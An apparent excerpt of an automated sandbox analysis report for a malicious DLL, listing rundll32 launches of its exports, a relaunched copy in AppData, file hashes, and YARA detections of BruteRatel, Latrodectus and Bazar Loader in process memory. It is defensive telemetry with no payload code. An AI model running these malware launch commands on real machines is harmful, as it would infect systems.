                                                                                                                  Target ID:15
                                                                                                                  Start time:00:04:08
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:16
                                                                                                                  Start time:00:04:08
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:18
                                                                                                                  Start time:00:04:08
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1868887059.00000292135D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1868680221.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1843192476.0000029213423000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1867965215.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2738816096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000012.00000002.2938671459.0000029211650000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2311847302.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2284190577.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1868287262.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1868470583.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:20
                                                                                                                  Start time:00:04:08
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 7272 -s 344
                                                                                                                  Imagebase:0x7ff67a3b0000
                                                                                                                  File size:570'736 bytes
                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:21
                                                                                                                  Start time:00:04:08
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 7288 -s 344
                                                                                                                  Imagebase:0x7ff67a3b0000
                                                                                                                  File size:570'736 bytes
                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:22
                                                                                                                  Start time:00:04:16
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                  Imagebase:0x7ff72b770000
                                                                                                                  File size:5'141'208 bytes
                                                                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:26
                                                                                                                  Start time:00:04:29
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:27
                                                                                                                  Start time:00:04:37
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Disassembly

                                                                                                                  No disassembly